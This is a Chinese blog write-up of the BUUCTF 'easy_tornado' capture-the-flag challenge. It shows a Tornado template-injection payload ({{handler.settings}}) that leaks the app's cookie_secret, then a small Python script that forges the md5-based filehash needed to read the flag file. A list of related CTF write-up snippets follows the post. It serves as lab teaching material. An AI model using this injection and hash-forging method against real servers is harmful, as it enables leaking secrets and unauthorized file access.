BUUCTF-esay_tornado

最新推荐文章于 2023-06-07 07:30:00 发布
最新推荐文章于 2023-06-07 07:30:00 发布
阅读量236 收藏
点赞数
分类专栏: Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ch_an_ger/article/details/102655012
版权

首先进去是能看到三个文件的,进去能得到不同的提示
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
查了一下render是渲染函数,能将变量渲染到模板中,再百度一下这题是模板注入,好了接下来又得看一下什么是模板注入了
https://www.jianshu.com/p/aef2ae0498df

回到这题,提示说flag在fllllllllllllag中,就试着在当前页面访问了一下
fb8548e2-3e1d-4f32-b91f-a8acb8901763.node3.buuoj.cn/file?filename=/fllllllllllllag
在这里插入图片描述
更神奇的是改变参数能原样输出
在这里插入图片描述
百度一下这考的是模板注入,通过看某大佬的博客知道cookie_secret在Application对象settings属性中,为什么会有这个想法呢?看其中一个提示md5(cookie_secret+md5(filename)),然后的操作我就看不懂了。。。。。
在这里插入图片描述
然后构造payload:?msg={{handler.settings}}拿到cookie_secret
在这里插入图片描述
接下来就是跑脚本了

import hashlib
def md5value(s):
    md5=hashlib.md5()
    md5.update(s)
    return md5.hexdigest()
def filehash():
    filename='/fllllllllllllag'
    cookie_s="eba88dfe-959d-4d80-a6a4-15a90da95fbf"
    print(md5value(filename.encode('utf-8')))
    x=md5value(filename.encode('utf-8'))
    y=cookie_s+x
    print(md5value(y.encode('utf-8')))

filehash()

跑出一段hash值
在这里插入图片描述
看着很眼熟有没有,回到falg.txt那个页面
在这里插入图片描述把这里改成跑出来的值试试,哦还有把文件名也改成藏flag的那个文件名
?filename=/fllllllllllllag&filehash=25674e1bc815ac79cd203ed227aff02f
这样就出flag了
flag{bf66c507-db8e-4bc9-bd32-ae7d9c08af95}

crazy' 夏末
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 easytornado 解题思路
xj28555的博客
07-14 1648
进入题目 有三个txt目录,我们分别点击。 第一个/flag.txt 他说flag 在/fllllllllllllag里面,那我们访问一下看看 回车后发现 报了一个error,且在浏览器上有回显,那判断这里是否存在模板注入呢,我们可以试一试,把error换成123看浏览器是否还存在回显。 还是有回显,初步证明这里是存在模板注入的。但是知道有模板注入没有更多的信息了,所以我们只好先放这里了。继续看其他目录。 第二个/welcome.txt 第二个是一个render,这个
BUUCTF-easy_tornado
wuerror的博客
07-07 3620
这题是2018护网杯原题的复现。 进去之后显示三个txt,每个点进去看看。内容如下: /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) 看看url,发现web9.buuoj.cn/file?filename=/flag.txt&fil...
alipay-easysdk-php:基于alipay-easysdk分离单独的php包
04-02
阿里云SDK PHP 本扩展基于 ,主要做了 删除其他语言代码包,制作只有PHP扩展的composer依赖包 添加.gitattributes用于安装扩展时忽略test/文件夹 本扩展版本与保持一致 安装使用 composer require alphasnow/alipay-easysdk-php 阿里云SDK 欢迎使用适用于PHP的Alipay Easy SDK。 适用于PHP的Alipay Esay SDK让您无需使用复杂编程即可访问支付宝开放平台开放的自身常用能力,SDK可以自动帮您满足此能力调用过程中所需的证书校验,加签,验签,发送HTTP请求等非功能性要求。 下面向您介绍用于PHP的Alipay Easy SDK的基本设计理念和使用方法。 设计理念 完全初始化的通用而全面的设计理念,Alipay Easy SDK对开放能力的API进行了更多粘贴近现代场景的精心设计与裁剪,简化
【CTF】buuctf web(二)——[护网杯 2018]easy_tornado
m0_52923241的博客
08-01 717
[护网杯 2018]easy_tornado 首先出来三个链接 查看flag.txt 提示flag在/fllllllllllllag中 OK,知道了第一个条件,filename=/fllllllllllllag 查看welcome.txt 查看hints.txt 分析一下 这里有两个参数,第一个参数filename,文件的名称,我们通过查看flag.txt文件知道,藏flag的文件名为fllllllllllllag;第二个参数filehash,翻译一下:文件哈希,也就是加密了 加密方法在第三个文件中md
buuctf 刷题记录 模板注入
SopRomeo的博客
01-16 865
查看源代码发现三个txt进入的格式是这样的 把filename改为/fllllllllllllag emmmmm,点其他连个看看 有思路了重点就是求出这个cookie_secret 作为一个菜鸡,百度tornado 然后了解到了模板注入(配上网址https://www.jianshu.com/p/aef2ae0498df) render是一个类似模板的东西,可以使用不同的参数来访问网页...
2023年春秋杯网络安全联赛春季赛writup
渗透测试研究中心
06-07 435
Re Emoji Connect 是Excel的插件,开始玩之后会初始化一个4848的矩阵,每个格子里有一个emoji,然后每次点击两个格子,如果两个格子里的emoji相同,就会消除这两个格子。一开始以为是消星星一类的三个格子的消除,但看game的逻辑每次只替换两个,所以确实是连连看。然后flag的逻辑就是每次消除的时候减去格子的 行列,下标是用神奇的方法从unicode转过去的,我这里直接用...
攻防世界WEB高手进阶区第三周
borrrrring的博客
07-24 311
PHP2 [题目描述]暂无 [题目场景] 这句话的意思是“你能告诉我这个网站吗?”,首先我们先获取php的源代码 在url后面输入/index.phps 我们可以发现这个代码不完整,打开该页面的源代码 我们可以看到php代码前面一部分被注释掉了,现在我们把代码复原 我们可以看到我们需要传入参数id,id的值有两个要求 不满足"admin"===$_GET[id] 通过$ _GET[id] = urldecode($ _GET[id]);实现$_GET[id] == “admin” 当传入参数id
BUUCTF---easy-tornado
weixin_44255856的博客
07-29 1651
打开链接发现存在3个txt文件 依次访问 flag.txt直接说明了,最终的flag在/fllllllllllllag文件下 hints.txt下提示是filehash,要是md5(cookie_secret+md5(filename))才可以结合/fllllllllllllag找到flag. 但是cookie_secret不知道 提示render. 谷歌发现render是python的一...
CTF题记——BUU刷题
m0re's blog
08-16 1683
本文目录[护网杯 2018]easy_tornado[CISCN2019 华北赛区 Day2 Web1]Hack World [护网杯 2018]easy_tornado 三个文件,内容如下: /flag.txt /flag.txt flag in /fllllllllllllag /welcome.txt /welcome.txt render /hints.txt /hints.txt md5(cookie_secret+md5(filename)) 首先分析浏览了所有的信息。(源码也没什
buuctf刷题 3(1个sstl模板注入 1个session伪造 以及php)
weixin_63231007的博客
05-03 699
[护网杯 2018]easy_tornado 1 访问页面所给的可以得到 /flag.txt flag in /fllllllllllllag 可知flag在/fllllllllllllag。 /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) render不知道是上面意思。看别人题解说:结合题目给的tornado,可以想到SSTI。 render()函数是渲染函数,进行服务器端渲染。所以能想到模板注入 [护网..
S7-1200_PLC_EASY_PLUS_V4.2
08-09
西门子S7-1200学习手册chm版本
S7-1200_Easy_Plus 西门子1200技术参考软件2.8
10-17
S7-1200_Easy_Plus 西门子1200技术参考软件3.2
S7-200 SMART PLC技术参考文档easy_plus_V2.6版本
07-04
S7-200 SMART PLC技术参考文档easy_plus_V2.6版本
PyPI 官网下载 | django-esay-account-0.0.3.tar.gz
01-10
资源来自pypi官网。 资源全名:django-esay-account-0.0.3.tar.gz
esayui框架
08-29
前端页面表格常用框架
图片以base64格式显示出来
热门推荐
Menqq的博客
06-22 1万+
图片转码:http://www.jsons.cn/img2base64 base64的图片可以直接显示在网页上面 <img class="cp-icon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAWIAAAEfCAYAAAB74MxlAAAACXBIWXMAAAsTAAALEwEAmpwYAAAFyGlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJX
文件包含之LFI
weixin_33675507的博客
11-08 363
0x00 含义&&类型 首先,PHP文件包含主要由这四个函数完成: include() //包含一些html模块文件 require() //包含一些数据库,配置文件 include_once() //只调用一次包含文件,多次调用就会报错 require_once() 当使用这4个函数包含一个新的文件时,该文件将作为PHP代...
国内移动端APP月活跃(MAU)Top5000 数据整理
06-16
国内移动端APP月活跃(MAU)Top5000 时间范围:2020年-2022年 具有一定参考价值 csv格式
和平巨魔跨进成免费.ipa
最新发布
06-16
和平巨魔跨进成免费.ipa
napt、esay-ip、nat有什么区别
05-03
NAPT(Network Address Port Translation)、ESAY-IP(Easy IP)和NAT(Network Address Translation)都是网络地址转换技术,它们的作用都是将内部网络的私有IP地址转换为公网IP地址,以实现内部网络和公网之间的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值